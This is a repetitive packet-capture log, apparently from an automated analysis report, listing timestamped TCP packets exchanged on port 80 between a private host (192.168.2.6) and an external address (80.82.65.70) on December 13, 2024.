                                              Dec 13, 2024 10:49:16.949668884 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949685097 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.949713945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.949745893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.950625896 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.950645924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.950680017 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.951311111 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.951392889 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.951410055 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.951438904 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.952928066 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.952944040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.952974081 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.953001022 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.953627110 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.953641891 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.953682899 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.954128981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.954143047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.954231977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.955213070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.955228090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.955265045 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.955279112 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.955904961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.955954075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.956082106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.956166983 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.956832886 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.956882000 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.956986904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.957026005 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.957704067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.957743883 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.957811117 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.957859039 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.958740950 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.958756924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.958790064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.958801985 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.959630966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.959644079 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.959695101 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.960520983 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.960576057 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.960582018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.960627079 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.961394072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.961463928 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.961500883 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.961549044 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.962459087 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.962476969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.962526083 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:16.963258028 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:16.963318110 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.025497913 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.025526047 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.025541067 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.025579929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.025612116 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.026475906 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.026489019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.026504040 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.026523113 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.026560068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.027375937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.027420998 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.027646065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.027702093 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.027736902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.028693914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.028707027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.028755903 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.028776884 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.029661894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.029675961 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.029702902 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.029720068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.031147957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031162977 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031205893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.031375885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031388044 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.031440020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.032234907 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.032352924 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.032355070 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.032418966 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.033518076 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.033531904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.033555031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.033577919 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.034265041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.034277916 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.034357071 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.035079002 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.035093069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.035115004 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.035141945 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.035859108 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.035902977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.036024094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.036077976 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.036906004 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.036946058 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.036984921 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038012981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038026094 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038074970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038074970 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038726091 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038775921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.038799047 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.038814068 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.039618969 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.039717913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.039784908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.039818048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.040565014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.040632010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.040664911 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.041455984 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.041507006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.041559935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.041593075 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.043338060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043349981 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043361902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043409109 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.043473005 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.043524981 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.045103073 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.045114994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.045126915 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.045146942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.045172930 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.046124935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.046135902 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.046152115 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.046173096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.046195984 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.047272921 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.047285080 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.047322035 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.047332048 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.048887968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.048903942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.048917055 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.048964977 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.048976898 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.050026894 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.050041914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.050055027 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.050074100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.050093889 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.051372051 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051387072 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051419973 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.051444054 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.051842928 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051852942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.051899910 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135005951 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135027885 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135092020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135116100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135329008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135447025 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.135454893 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.135479927 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.136082888 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.136159897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.136162043 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.136200905 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.136985064 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.137027979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.137083054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.137154102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.137904882 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.137948036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.138001919 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.138037920 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.139007092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.139019966 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.139053106 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.139923096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.139981985 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.140033007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.140966892 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.141051054 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.141060114 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.141268015 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.141926050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.141938925 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.141974926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.142700911 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.142713070 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.142744064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.142771006 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.143517017 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.143541098 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.143569946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.143603086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.144341946 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.144376993 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.144448042 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.144484043 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.145390034 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.145402908 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.145428896 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.145442963 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.146203995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.146236897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.146415949 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.146501064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.147082090 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.147115946 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.147123098 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.147180080 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.148278952 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.148292065 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.148343086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.148343086 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.149106979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.149120092 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.149156094 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.149823904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.149861097 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.150048018 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.150089979 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.150999069 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.151011944 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.151068926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.151068926 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.151926041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.151968002 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.152281046 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.152421951 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.152699947 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.152714968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.152765036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.152774096 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.153573036 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.153613091 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.153717041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.153764009 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.154525995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.154572964 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.154588938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.154628992 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.155548096 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.155596018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.217166901 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.217222929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.217226982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.217264891 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.217474937 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.217526913 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.217633963 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.217689037 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.218781948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.218796968 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.218826056 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.218847036 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.219357014 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.219399929 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.219825029 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.219840050 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.219872952 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.220571995 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.220639944 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.220670938 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.220711946 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.221513987 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.221554041 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.221591949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.222428083 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.222492933 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.222569942 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.222635031 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.223453999 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.223469019 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.223500967 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.223526955 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.224280119 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.224323988 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.224354029 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.224395037 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.225289106 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.225302935 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.225332975 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.225348949 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.226659060 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.226675987 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.226706982 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.226736069 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.227334976 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.227349997 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.227400064 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.227422953 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.227894068 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.227998018 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.228024006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.228099108 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.229090929 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.229105949 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.229137897 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.229964972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.229979038 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.230026007 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.231034994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.231048107 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.231086969 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.231100082 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.231642008 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.231686115 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.231848001 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.232002020 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.232814074 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.232825994 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.232866049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.233944893 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.233958006 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.233990908 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.234015942 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.234522104 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.234534979 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.234575033 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.235364914 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.235429049 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.235673904 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.235737085 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.236337900 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.236380100 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.236485958 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.236562014 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.237257957 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.237303972 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.237435102 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.237484932 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.238842010 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.238857031 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.238893032 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.239022970 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.239097118 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.239136934 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.239291906 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.239954948 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.240027905 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.240252972 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.240309954 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.240828991 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.240978003 CET804985880.82.65.70192.168.2.6
                                              Dec 13, 2024 10:49:17.240981102 CET4985880192.168.2.680.82.65.70
                                              Dec 13, 2024 10:49:17.241018057 CET4985880192.168.2.680.82.65.70
